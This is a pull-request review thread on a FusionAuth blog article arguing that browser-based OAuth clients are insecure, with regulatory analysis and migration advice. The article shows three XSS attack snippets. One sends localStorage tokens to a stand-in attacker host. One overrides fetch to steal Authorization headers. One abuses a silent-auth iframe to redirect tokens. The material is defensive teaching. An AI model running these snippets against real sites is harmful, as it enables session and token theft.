blog: architecture driven auth part 3 (BBOC) (#3967)
FusionAuth/fusionauth-site: astro/src/content/blog/browser-based-oauth-client-security-architecture.mdx

> This architecture is not recommended for business applications, sensitive applications, and applications that handle personal data.

BBOC stores tokens in browser storage, exposing refresh tokens to JavaScript, which creates vulnerabilities that defenders can't fully mitigate.

{/* more */}

Several high-profile breaches over the last two years exploited vulnerabilities inherent to BBOC implementations:

- **January 2025:** DoubleClickjacking attacks bypassed all traditional defenses including X-Frame-Options, Content Security Policy, and SameSite cookies.
- **2024-2025:** ShinyHunters' OAuth refresh token campaign combined social engineering with token theft, affecting organizations that believed their OAuth implementations were secure.
- **January 2024:** Microsoft's Midnight Blizzard breach exploited legacy OAuth applications without multi-factor authentication (MFA).
- **May 2024:** The Snowflake breach affected 165 organizations through OAuth misconfigurations and service accounts lacking MFA.

While not all these breaches involved BBOC specifically, they highlight the risks of OAuth implementations that expose tokens to client-side vulnerabilities.

> This article examines why BBOC is insecure, when it becomes unacceptable, how to reduce risk when forced to use it, and how to migrate to secure architectures. It is part three of a series covering OAuth security architectures. [Part 1 covered Backend-for-Frontend (BFF) architecture](/blog/backend-for-frontend-security-architecture), the most secure pattern. [Part 2 examined Token-Mediating Backend (TMB)](/blog/auth-architecture-part2-TMB), a moderately secure middle ground.

Reviewer: ```suggestion
This article examines why BBOC is insecure, when it becomes unacceptable, how to reduce risk when forced to use it, and how to migrate to secure architectures. It is part three of a series covering OAuth security architectures. [Part 1 covered Backend-for-Frontend (BFF) architecture](/blog/backend-for-frontend-security-architecture), the most secure pattern. [Part 2 examined Token-Mediating Backend (TMB)](/blog/auth-architecture-part2-tmb), a moderately secure middle ground.
```

* **PCI DSS 4.0 (Payment Card Industry):** Even if cardholder data itself isn't in browser storage, the credentials providing access to that data must be protected. BBOC implementations fail multiple PCI DSS requirements for protecting stored cardholder data and preventing broken authentication.
* **SOC 2 (Service Organizations):** SOC 2 Trust Service Criteria require strong access controls and confidentiality protections. BBOC's exposure of refresh tokens violates these criteria unless extensive compensating controls are in place.
* **GDPR (EU Data Protection):** Article 32 requires appropriate technical measures to protect personal data. BBOC's token exposure creates direct challenges for breach notification obligations and data protection impact assessments.

## Migration from BBOC to secure architectures

Moving from BBOC to TMB or BFF requires systematic changes, but the complexity depends on your target architecture and application structure.

### Migration to TMB

> With [TMB](/blog/auth-architecture-part2-TMB), the migration focuses on moving token exchange and storage to the backend. Backend endpoints handle OAuth flows using PKCE and store refresh tokens server-side, returning only short-lived access tokens to the frontend. Much of the frontend OAuth logic stays similar to BBOC, but the frontend remains complex since it still manages access tokens for direct API calls.

Reviewer: ```suggestion
With [TMB](/blog/auth-architecture-part2-tmb), the migration focuses on moving token exchange and storage to the backend. Backend endpoints handle OAuth flows using PKCE and store refresh tokens server-side, returning only short-lived access tokens to the frontend. Much of the frontend OAuth logic stays similar to BBOC, but the frontend remains complex since it still manages access tokens for direct API calls.
```

The security landscape in 2025 makes BBOC unacceptable for any application handling user data. XSS attacks have evolved from rare occurrences to constant threats, and supply chain attacks have made even your own dependencies part of your attack surface.

At FusionAuth, we strongly recommend migrating all applications away from BBOC to BFF. FusionAuth's [Hosted Backend](/docs/apis/hosted-backend) provides a production-ready BFF implementation with detailed documentation to get you started.

## Further reading

Resources for a deeper understanding of OAuth security architectures:

- [The authentication architecture examples repository](https://github.com/kmaida/auth-architecture): Browse working implementations of BFF, TMB, and BBOC patterns with security comparisons.
- [Part 1: Backend-for-Frontend security architecture](/blog/backend-for-frontend-security-architecture): A comprehensive guide to the most secure OAuth pattern.

> - [Part 2: Token-Mediating Backend security architecture](/blog/auth-architecture-part2-TMB): The middle-ground approach, balancing security and implementation complexity.

Reviewer: ```suggestion
- [Part 2: Token-Mediating Backend security architecture](/blog/auth-architecture-part2-tmb): The middle-ground approach, balancing security and implementation complexity.
```

---

> publish_date: 2025-10-08

Reviewer: ```suggestion
publish_date: 2026-06-03
```

title: "Browser-Based OAuth Client: The architecture you shouldn't be using"
htmlTitle: "Browser-Based OAuth Client: Why this OAuth architecture is insecure"
description: Why BBOC is the least secure OAuth pattern, when it's acceptable, how to implement it safely, and how to migrate to secure architectures.

> image: /img/blogs/bff/bff-header.png # TODO: replace image

Reviewer: Reminder to update this image!

Reviewer 2: New image added in [73efa6d9f](https://github.com/FusionAuth/fusionauth-site/commit/73efa6d9f), frontmatter updated in [97d4c83fb](https://github.com/FusionAuth/fusionauth-site/commit/97d4c83fb).

> authors: Kim Maida

Reviewer: ```suggestion
authors: Nathan Contino, Kim Maida
```
Best to add me to the list since we're significantly changing this article.

categories: Education, Security
tags: oauth, security, architecture, browser, javascript, spa, xss
excerpt_separator: "{/* more */}"
---

Of all possible browser-based OAuth architectures, the Browser-Based OAuth Client (BBOC) pattern is the least secure. Despite this, the BBOC pattern remains the most commonly implemented approach due to how convenient it is. This convenience and simplicity also leads to OAuth providers often using BBOC to demonstrate quickstarts and sample code - I can't blame some developers for thinking this is the recommended approach!

However, BBOC creates unacceptable security risk for any application handling user data.

The Internet Engineering Task Force (IETF), in its [OAuth 2.0 for Browser-Based Applications](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-browser-based-apps) draft, is explicit in its warning: 

> This architecture is not recommended for business applications, sensitive applications, and applications that handle personal data.

> BBOC stores tokens in browser storage, exposing refresh tokens to JavaScript, and creating vulnerabilities that defenders can't fully mitigate.

Reviewer: ```suggestion
BBOC stores tokens in browser storage, exposing refresh tokens to JavaScript, which creates vulnerabilities that defenders can't fully mitigate.
```

Reviewer 2: Addressed in [6b521b75c](https://github.com/FusionAuth/fusionauth-site/commit/6b521b75c)

### Vulnerability 1: Cross-Site Scripting token theft

Cross-Site Scripting (XSS) allows attackers to execute arbitrary JavaScript in your application's context. Once an attacker achieves XSS, stealing tokens from `localStorage` requires a single line of code:

```javascript
fetch('https://attacker.com/collect', {
  method: 'POST',
  body: JSON.stringify({
    access: localStorage.getItem('access_token'),
    refresh: localStorage.getItem('refresh_token'),
    id: localStorage.getItem('id_token')
  })
});
```

The 2024 HotJar WordPress vulnerability demonstrated the scale of XSS impact. HotJar, a user behavior analytics service, suffered an XSS vulnerability that affected approximately 1 million websites, including sites owned by Microsoft, Adobe, and T-Mobile. Any attacker who exploited the HotJar XSS could execute code on all those sites. If those sites stored OAuth tokens in `localStorage`, all tokens were immediately compromised.

XSS vulnerabilities arise from multiple sources:

- Direct injection through unsanitized user input.
- DOM-based XSS through client-side JavaScript.
- Stored XSS through database content.
- Third-party script compromise.

> - Supply chain attacks on dependencies.

Reviewer: Should we include this line, if Vulnerability 2 below covers this case? Might be simpler to omit it here if it isn't sufficiently differentiated.
```suggestion
```

> Although PKCE was designed as a mechanism to protect native apps, this advice applies to all kinds of OAuth clients, including web applications.

Public clients like BBOC must use PKCE, since OAuth 2.1 now requires that both public and confidential clients use PKCE.

**The implicit grant is officially deprecated.** RFC 9700 explicitly states:

> The implicit grant (response type 'token') and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay.

The implicit grant placed tokens directly in URL fragments, which are exposed through browser history, cloud sync services, third-party scripts monitoring URL changes, and referrer headers on subsequent navigation.

Implicit grants emerged when cross-origin resource sharing (CORS) adoption was limited and browsers couldn't make cross-origin token exchange requests. CORS is now universal. The Authorization Code Flow with PKCE provides better security with equivalent functionality. Implicit grant has no remaining justification.

> You can spot implicit grant implementations by looking for `response_type=token` in authorization requests. Any application using the implicit grant must be re-architected to use the Authorization Code Flow with PKCE.

Reviewer: ```suggestion
* **The Authorization Code Flow with PKCE is required for all OAuth clients.** The specification states: 

  > Although PKCE was designed as a mechanism to protect native apps, this advice applies to all kinds of OAuth clients, including web applications.

  Public clients like BBOC must use PKCE, since OAuth 2.1 now requires that both public and confidential clients use PKCE.

* **The implicit grant is officially deprecated.** RFC 9700 explicitly states:

  > The implicit grant (response type 'token') and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay.

  The implicit grant placed tokens directly in URL fragments, which are exposed through browser history, cloud sync services, third-party scripts monitoring URL changes, and referrer headers on subsequent navigation.

  Implicit grants emerged when cross-origin resource sharing (CORS) adoption was limited and browsers couldn't make cross-origin token exchange requests. CORS is now universal. The Authorization Code Flow with PKCE provides better security with equivalent functionality. Implicit grant has no remaining justification.

  You can spot implicit grant implementations by looking for `response_type=token` in authorization requests. Any application using the implicit grant must be re-architected to use the Authorization Code Flow with PKCE.
```
Suggestion: it's easier to parse these changes in bullet form

> **Token storage guidance is explicit.** RFC 9700 recommends service workers as the most secure browser storage location when tokens must exist in the browser. Service workers provide a separate execution context from the DOM, offering some protection against DOM-based XSS. However, the specification acknowledges that this provides only partial protection. Service workers remain vulnerable to registration manipulation, update exploitation, and proxy attacks.

Reviewer: ```suggestion
* **Token storage guidance is explicit.** RFC 9700 recommends service workers as the most secure browser storage location when tokens must exist in the browser. Service workers provide a separate execution context from the DOM, offering some protection against DOM-based XSS. However, the specification acknowledges that this provides only partial protection. Service workers remain vulnerable to registration manipulation, update exploitation, and proxy attacks.
```
Continuation of the above comment.

Reviewer 2: Fixed in [970770f46](https://github.com/FusionAuth/fusionauth-site/commit/970770f46).

## BBOC fails regulatory requirements

Many regulatory frameworks explicitly or implicitly require secure credential storage. BBOC's architectural vulnerabilities make compliance extremely difficult or impossible for regulated industries:

- **HIPAA (Healthcare):** BBOC violates multiple HIPAA Security Rule requirements for protecting electronic Protected Health Information (ePHI), including unique user identification, transmission security, and workforce access management.
- **PCI DSS 4.0 (Payment Card Industry):** Even if cardholder data itself isn't in browser storage, the credentials providing access to that data must be protected. BBOC implementations fail multiple PCI DSS requirements for protecting stored cardholder data and preventing broken authentication.
- **SOC 2 (Service Organizations):** SOC 2 Trust Service Criteria require strong access controls and confidentiality protections. BBOC's exposure of refresh tokens violates these criteria unless extensive compensating controls are in place.

> - **GDPR (EU Data Protection):** Article 32 mandates appropriate technical measures to protect personal data. BBOC's vulnerabilities create significant compliance challenges, especially regarding breach notification and data protection impact assessments.

Reviewer: ```suggestion
* **HIPAA (Healthcare):** BBOC violates multiple HIPAA Security Rule requirements for protecting electronic Protected Health Information (ePHI), including unique user identification, transmission security, and workforce access management.
* **PCI DSS 4.0 (Payment Card Industry):** Even if cardholder data itself isn't in browser storage, the credentials providing access to that data must be protected. BBOC implementations fail multiple PCI DSS requirements for protecting stored cardholder data and preventing broken authentication.
* **SOC 2 (Service Organizations):** SOC 2 Trust Service Criteria require strong access controls and confidentiality protections. BBOC's exposure of refresh tokens violates these criteria unless extensive compensating controls are in place.
* **GDPR (EU Data Protection):** Article 32 mandates appropriate technical measures to protect personal data. BBOC's vulnerabilities create significant compliance challenges, especially regarding breach notification and data protection impact assessments.
```

Reviewer 2: Fixed in [efe4a2a60](https://github.com/FusionAuth/fusionauth-site/commit/efe4a2a60)

- **Rate limiting:** Apply aggressive rate limiting on authentication endpoints to slow brute force and token theft attempts.
- **Demonstrating Proof of Possession (DPoP):** Implement DPoP to bind tokens to specific clients, preventing token replay by attackers.
- **Mutual TLS ([mTLS](https://datatracker.ietf.org/doc/html/rfc8705)):** Similar to DPoP, use mTLS to bind tokens to client certificates. This is not ideal for browser implementation as it requires managed certificate distribution.

Most strategies provide only marginal security improvements, with the exception of DPoP and mTLS. If you're investing significant effort into these controls, you're better off investing in migrating to TMB or BFF architectures.

## Decision framework

Use this framework to determine the appropriate architecture for your application:

- **If your app handles PII, PHI, or financial data** → It requires BFF, no exceptions. These data types demand maximum security. Regulatory compliance typically mandates BFF.
- **If your app requires compliance (SOC 2, HIPAA, PCI DSS, GDPR)** → It requires BFF. Compliance frameworks increasingly view token-in-browser as a control deficiency.

> - **Otherwise** → It requires TMB at minimum, although BFF is best.

Reviewer: ```suggestion
- **If your app handles PII, PHI, or financial data**: Always use BFF. Sensitive data demands maximum security. Regulatory compliance typically mandates BFF.
- **If your app requires compliance (SOC 2, HIPAA, PCI DSS, GDPR)**: Always use BFF. Regulatory compliance usually mandates BFF, but if it doesn't already, that could change after future data leaks. Implementing anything less is technical debt.
- **Otherwise**: Use TMB at a minimum, but prefer BFF.
```

Reviewer 2: Updated in [e2b31537b](https://github.com/FusionAuth/fusionauth-site/commit/e2b31537b)

The security landscape in 2025 makes BBOC's vulnerabilities unacceptable for any application handling user data. XSS attacks have evolved from rare occurrences to constant threats. Supply chain attacks demonstrate that trusting your own code isn't sufficient — dependencies matter.

At FusionAuth, we strongly recommend migrating all applications away from BBOC to BFF. The security benefits are substantial, and the risk reduction justifies the migration effort. FusionAuth's [Hosted Backend](/docs/apis/hosted-backend) provides a production-ready BFF implementation with detailed documentation to facilitate this transition.

## Further reading

Explore these resources for a deeper understanding of OAuth security architectures:

- [The authentication architecture examples repository](https://github.com/kmaida/auth-architecture):** Browse working implementations of BFF, TMB, and BBOC patterns with security comparisons.
- [Part 1: Backend-for-Frontend security architecture](/blog/backend-for-frontend-security-architecture):** A comprehensive guide to the most secure OAuth pattern.

> - [Part 2: Token-Mediating Backend security architecture](/blog/auth-architecture-part2-TMB):** The middle-ground approach, balancing security and implementation complexity.

Reviewer: TODO: Reminder to uncomment the forward links in the other articles.

Reviewer 2: Addressed in [f448bf7a1](https://github.com/FusionAuth/fusionauth-site/commit/f448bf7a1). Forward links uncommented in both Part 1 and Part 2 articles.

## Understanding BBOC architecture

The Browser-Based OAuth Client pattern places the entire OAuth flow in JavaScript code running in the browser. The browser acts as a public OAuth client, obtains tokens directly from the authorization server, and stores all tokens, including sensitive refresh tokens, using browser storage mechanisms.

This contrasts sharply with the architectures covered earlier in this series:

- **Backend-for-Frontend (BFF):** No tokens reach the browser. The backend acts as the OAuth client and stores all tokens server-side. The browser receives only an `HttpOnly` session cookie. Requests to resource servers are proxied through the backend, which adds access tokens as needed.
- **Token-Mediating Backend (TMB):** The backend obtains tokens as a confidential client but passes short-lived access tokens to the browser. Refresh tokens remain server-side.

> - **Browser-Based OAuth Client (BBOC):** JavaScript in the browser handles everything - authorization requests, token exchange, token storage, and token refresh. All tokens exist in browser storage.

Reviewer: This bullet point implies that BBOC was covered earlier in the series. Given that the first paragraph of this section already covers this, we can remove this bullet.

```suggestion
```

Understanding why BBOC creates unacceptable security risk requires understanding the fundamental difference between public and confidential OAuth clients.

### Public clients cannot maintain secrets

BBOC applications are **public clients** in OAuth terminology. A public client cannot maintain the confidentiality of its credentials. Any "secret" embedded in JavaScript code is immediately visible to all users. You can obfuscate code, but obfuscation provides no security — anyone can read the source, inspect network traffic, or step through your code in a debugger.

This has profound implications. Public clients:

- Cannot use client secrets in token exchange requests.
- Must rely entirely on PKCE (Proof Key for Code Exchange) for request validation.

> - Cannot authenticate to the authorization server in the traditional sense.

Reviewer 3: I'm not really sure what's meant by this. It's true, but it's not really explained enough to make sense here as a list item.

Contrast this with the **confidential clients** used in BFF and TMB architectures, which can:

- Store client secrets server-side where users cannot access them.
- Authenticate to the authorization server using those secrets.
- Operate in an environment you control.

## Token exposure across architectures

The critical difference between BBOC and other architectures is what tokens reach the browser:

> | Aspect                 | BBOC                  | TMB                    | BFF                     |

Reviewer: ```suggestion
|                     | BBOC                  | TMB                    | BFF                     |
```
This column header is a little confusing -- better to just not label our label column, IMO.

## The many vulnerabilities of browser token storage

The IETF states plainly:

> localStorage does not protect against unauthorized access from malicious JavaScript, as the attacker would be running code within the same origin, and as such, would be able to read the contents of the localStorage.

This understates the problem. Browser storage provides essentially zero protection against credential theft when JavaScript code is compromised. Understanding the attack vectors reveals why browser-based OAuth 2.0 clients are extremely vulnerable.

### Vulnerability 1: Cross-Site Scripting token theft

Cross-Site Scripting (XSS) allows attackers to execute arbitrary JavaScript in your application's context. Once an attacker achieves XSS, stealing tokens from `localStorage` requires a single line of code:

```javascript
fetch('https://attacker.com/collect', {
  method: 'POST',
  body: JSON.stringify({
    access: localStorage.getItem('access_token'),
    refresh: localStorage.getItem('refresh_token'),
    id: localStorage.getItem('id_token')
  })
});
```

> The 2024 HotJar WordPress vulnerability demonstrated the scale of XSS impact. HotJar, a user behavior analytics service, suffered an XSS vulnerability that affected approximately 1 million websites including Microsoft, Adobe, and T-Mobile. Any attacker who exploited the HotJar XSS could execute code on all those sites. If those sites stored OAuth tokens in `localStorage`, all tokens were immediately compromised.

Reviewer: "Microsoft, Adobe, and T-Mobile" all have many websites, not just one -- we should clarify:

```suggestion
The 2024 HotJar WordPress vulnerability demonstrated the scale of XSS impact. HotJar, a user behavior analytics service, suffered an XSS vulnerability that affected approximately 1 million websites, including sites owned by Microsoft, Adobe, and T-Mobile. Any attacker who exploited the HotJar XSS could execute code on all those sites. If those sites stored OAuth tokens in `localStorage`, all tokens were immediately compromised.
```

The combination of long-lived refresh tokens and browser storage creates catastrophic risk. An XSS attack lasting seconds can steal tokens that provide access for months.

### Vulnerability 4: Token storage options present a spectrum of insecurity

BBOC implementations must choose where to store tokens. Every option has security implications:

**In-memory storage** stores tokens in JavaScript variables rather than browser APIs. Tokens disappear on page reload, requiring users to re-authenticate. This provides slightly better security, as tokens only exist while JavaScript is running. However, the user experience degradation is severe. Every page reload, tab refresh, or navigation forces re-authentication. Users find this unacceptable for any non-trivial application. Security improvements are minimal since XSS attacks still access in-memory variables.

**`sessionStorage`** isolates tokens to a single browser tab. Tokens don't persist across tab closures. Different tabs require separate authentications. This provides tab-level isolation but remains fully vulnerable to XSS within that tab context. An attacker compromising any tab gains full token access for that session.

> **`localStorage`** is the most common choice. Tokens persist across page reloads and tab closures. `localStorage` shares tokens across all tabs in the same origin. This provides the best user experience - users authenticate once and remain authenticated across sessions. It also provides the worst security - tokens persist indefinitely until explicitly cleared, and all JavaScript in the origin can access them. XSS attacks on any page in your domain expose all tokens.

Reviewer 3: ```suggestion
**`localStorage`** is the most common choice. Tokens persist across page reloads and tab closures. `localStorage` shares tokens across all tabs in the same origin. This provides the least disruptive user experience: users authenticate once and remain authenticated across sessions. It also provides the worst security: tokens persist indefinitely until explicitly cleared, and all JavaScript in the origin can access them. XSS attacks on any page in your domain expose all tokens.
```

**IndexedDB:** Offers similar capabilities to `localStorage` with more complex APIs and larger storage capacity. IndexedDB provides no security advantages over `localStorage` for token storage. The same XSS and JavaScript access concerns apply. The added complexity provides no security benefit.

**Service workers** operate in a separate JavaScript context from the DOM. Service workers can intercept network requests and cache data. They provide the most secure browser-based storage option because:

- Service worker code runs in an isolated context.
- DOM-based XSS cannot directly access service worker scope.
- Registration requires HTTPS and user agent validation.

However, service workers still have vulnerabilities:

- **Registration manipulation:** Attackers can register malicious service workers if they achieve code execution in the page context.
- **Proxy attacks:** Compromised service workers intercept all network traffic including token requests.

> - **Update exploitation:** Attackers who compromise the service worker update process and can inject malicious code.

Reviewer 3: Awkward grammar in this sentence

> Service workers provide the best *browser-based* storage security. This is still fundamentally less secure than not storing tokens in the browser at all.

Reviewer 3: ```suggestion
Service workers provide the least insecure *browser-based* storage security. This is still fundamentally less secure than not storing tokens in the browser at all.
```

```javascript
// Override fetch to intercept all HTTP requests
const originalFetch = window.fetch;
window.fetch = function(...args) {
  // Check if request includes Authorization header
  const [url, options] = args;
  if (options?.headers?.Authorization) {
    // Exfiltrate the token
    originalFetch('https://attacker.example.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        token: options.headers.Authorization,
        url: url
      })
    });
  }
  // Call original fetch to avoid detection
  return originalFetch.apply(this, args);
};
```

This attack doesn't access `localStorage` directly. It intercepts tokens as your application uses them. Similar attacks can override:

- `XMLHttpRequest.prototype.open` and `XMLHttpRequest.prototype.send`.
- `WebSocket` constructors.
- `EventTarget.prototype.addEventListener`.
- Any prototype method your application uses for authenticated requests.

Prototype pollution attacks succeed even when you store tokens in JavaScript closures or private variables. The interception occurs at the network layer, not the storage layer.

### Vulnerability 6: Silent authentication abuse

> OAuth providers support "silent authentication" to refresh user sessions without visible redirects. Applications implement this using hidden iframes that load the authorization endpoint. If the user has an active session, the authorization server immediately returns new tokens without user interaction.

Reviewer 3: ```suggestion
Some OAuth providers support "silent authentication" to refresh user sessions without visible redirects. Applications implement this using hidden iframes that load the authorization endpoint. If the user has an active session, the authorization server immediately returns new tokens without user interaction.
```

Silent authentication improves user experience by preventing repeated login prompts. However, browser privacy features like Intelligent Tracking Prevention (ITP) increasingly block the cross-origin cookies it relies on, making it unreliable. It also creates an attack vector. An attacker who achieves XSS can abuse this pattern by executing the following code

```javascript
// Create hidden iframe for silent authentication
const iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.src = 'https://auth-provider.example.com/authorize?' +
  'client_id=YOUR_CLIENT_ID&' +
  'response_type=code&' +
  'redirect_uri=https://attacker.example.com/callback&' +
  'prompt=none&' +  // Silent authentication
  'state=attacker_state';
document.body.appendChild(iframe);
```

> The IETF identifies this in Section 5.1.3 [Acquisition and Extraction of New Tokens](https://www.ietf.org/archive/id/draft-ietf-oauth-browser-based-apps-17.html#name-acquisition-and-extraction-). Even if the attacker cannot directly access existing tokens in your application's storage, they can:

Reviewer: ```suggestion
The IETF identifies this in [Section 5.1.3 (Acquisition and Extraction of New Tokens)](https://www.ietf.org/archive/id/draft-ietf-oauth-browser-based-apps-17.html#section-5.1.3). Even if the attacker cannot directly access existing tokens in your application's storage, they can:
```
slight tweak for cleaner URL

- Initiate a new authorization flow with attacker-controlled parameters.
- Use `prompt=none` to avoid user interaction.
- Redirect the response to an attacker-controlled endpoint.
- Obtain fresh tokens without the user's awareness.

> This attack bypasses token storage security entirely. The attacker doesn't steal existing tokens; they acquire new ones using the user's active authorization server session.

Reviewer: ```suggestion
This attack bypasses token storage security entirely. Rather than stealing existing tokens, the attacker acquires a new token using the user's active authorization server session.
```
suggestion: avoid LLM cliches (this isn't _quite_ "it's not X, it's Y" but it is a little too close for my comfort)

| Prototype pollution            | ❌               | ⚠️             | ✅              |
| CSRF bypass attacks            | ❌               | ⚠️             | ⚠️             |
| Client code hijacking          | ❌               | ❌              | ❌              |

The overall effectiveness of the architectures can be summarized as follows:

- **BBOC** provides 0% mitigation, making it vulnerable to all documented attacks.
- **TMB** offers average mitigation, protecting refresh tokens and preventing new token acquisition.
- **BFF** has above-average mitigation, failing only on client hijacking, a vulnerability that is inherent to all web applications.

## IETF guidance: When browser-based clients become unacceptable

The IETF provides authoritative OAuth guidance through multiple specifications. Two documents define current best practices:

- **OAuth 2.0 Security Best Current Practice** (RFC 9700, published January 2025): Consolidates security recommendations across the OAuth ecosystem.
- **OAuth 2.0 for Browser-Based Applications** (in draft, future RFC expected): Specific guidance for browser implementations.

### RFC 9700 mandates

> RFC 9700 establishes mandatory security requirements for all OAuth implementations:

Reviewer: We should link at first mention (unless I missed a prior mention with a link)?

Reviewer: Still relevant!

```suggestion
[RFC 9700](https://datatracker.ietf.org/doc/html/rfc9700) establishes mandatory security requirements for all OAuth implementations:
```

**The Authorization Code Flow with PKCE is required for all OAuth clients.** The specification states: 

> Although PKCE was designed as a mechanism to protect native apps, this advice applies to all kinds of OAuth clients, including web applications.

> Public clients like BBOC must use PKCE without exception. Even confidential clients should implement PKCE for defense-in-depth. OAuth 2.1 now requires both public and confidential clients to use PKCE.

Reviewer: ```suggestion
Public clients like BBOC must use PKCE, since OAuth 2.1 now requires that both public and confidential clients use PKCE.
```
Without defining what public/confidential clients are, I'm not sure what the middle sentence adds here. Same with 'without exception'.

The implicit grant placed tokens directly in URL fragments, which are exposed through browser history, cloud sync services, third-party scripts monitoring URL changes, and referrer headers on subsequent navigation.

Implicit grants emerged when cross-origin resource sharing (CORS) adoption was limited and browsers couldn't make cross-origin token exchange requests. CORS is now universal. The Authorization Code Flow with PKCE provides better security with equivalent functionality. Implicit grant has no remaining justification.

**Token storage guidance is explicit.** RFC 9700 recommends service workers as the most secure browser storage location when tokens must exist in the browser. Service workers provide a separate execution context from the DOM, offering some protection against DOM-based XSS. However, the specification acknowledges that this provides only partial protection. Service workers remain vulnerable to registration manipulation, update exploitation, and proxy attacks.

> You can spot implicit grant implementations by looking for `response_type=token` in authorization requests. Any application using the implicit grant must be re-architected to use the Authorization Code Flow with PKCE.

Reviewer: +1

> ### Guidance in the OAuth 2.0 for Browser-Based Applications draft

Reviewer: ```suggestion
### Guidance in the OAuth 2.0 for Browser-Based Applications Draft
```

### Guidance in the OAuth 2.0 for Browser-Based Applications draft

> The [OAuth 2.0 for Browser-Based Applications](https://www.ietf.org/archive/id/draft-ietf-oauth-browser-based-apps-17.html#name-summary-3) specification provides explicit guidance on BBOC:

Reviewer 3: Link to https://datatracker.ietf.org/doc/html/draft-ietf-oauth-browser-based-apps instead of the archive URLs because this will use the latest drafts.

> This architecture is not recommended for business applications, sensitive applications, and applications that handle personal data.

> This is not a conditional warning. The IETF states that BBOC creates unacceptable risk for any application handling user data. The vulnerability is architectural, not implementation-dependent. No amount of security controls can overcome the fundamental decision to store credentials in JavaScript-accessible locations.

Reviewer: Lots of LLM cliches in this paragraph. Maybe we can simplify?

```suggestion
The IETF states that BBOC creates unacceptable risk for any application handling user data. No amount of security controls can overcome the fundamental vulnerability of storing credentials in locations accessible via JavaScript.
```

- **HIPAA (Healthcare):** BBOC violates multiple HIPAA Security Rule requirements for protecting electronic Protected Health Information (ePHI), including unique user identification, transmission security, and workforce access management.
- **PCI DSS 4.0 (Payment Card Industry):** Even if cardholder data itself isn't in browser storage, the credentials providing access to that data must be protected. BBOC implementations fail multiple PCI DSS requirements for protecting stored cardholder data and preventing broken authentication.
- **SOC 2 (Service Organizations):** SOC 2 Trust Service Criteria require strong access controls and confidentiality protections. BBOC's exposure of refresh tokens violates these criteria unless extensive compensating controls are in place.
- **GDPR (EU Data Protection):** Article 32 mandates appropriate technical measures to protect personal data. BBOC's vulnerabilities create significant compliance challenges, especially regarding breach notification and data protection impact assessments.

## Migration from BBOC to secure architectures

> Moving from BBOC to TMB or BFF requires systematic changes to authentication flows, token management, and API integration. The migration complexity depends on your target architecture and application structure.

Reviewer: ```suggestion
Moving from BBOC to TMB or BFF requires systematic changes, but the complexity depends on your target architecture and application structure.
```

Moving from BBOC to TMB or BFF requires systematic changes to authentication flows, token management, and API integration. The migration complexity depends on your target architecture and application structure.

### Migration to TMB

Backend endpoints handle OAuth flows using PKCE and store refresh tokens in server-side sessions while returning short-lived access tokens to the frontend. The frontend implements in-memory token storage with automatic refresh logic that calls the backend token endpoint when tokens near expiration. With TMB, much of the frontend OAuth logic remains similar to BBOC, and the migration focuses on moving token exchange and storage to the backend. The frontend remains complex due to direct API calls requiring access token management.

### Migration to BFF

> BFF requires roughly double the TMB effort, implementing a universal proxy endpoint that validates sessions, manages token refresh automatically, and forwards all API requests to resource servers. Frontend code is simplified to a basic API client that routes calls through the proxy with session cookies for authentication — no token management needed. Additional challenges include performance optimization through connection pooling and caching to address added proxy latency.

Reviewer 3: ```suggestion
BFF requires implementation of proxy endpoints that validate sessions, manage token refresh automatically, and forward all API requests to resource servers. Frontend code is simplified to a basic API client that routes calls through the proxy with session cookies for authentication — no token management needed. Additional challenges include performance optimization through connection pooling and caching to address added proxy latency.
```
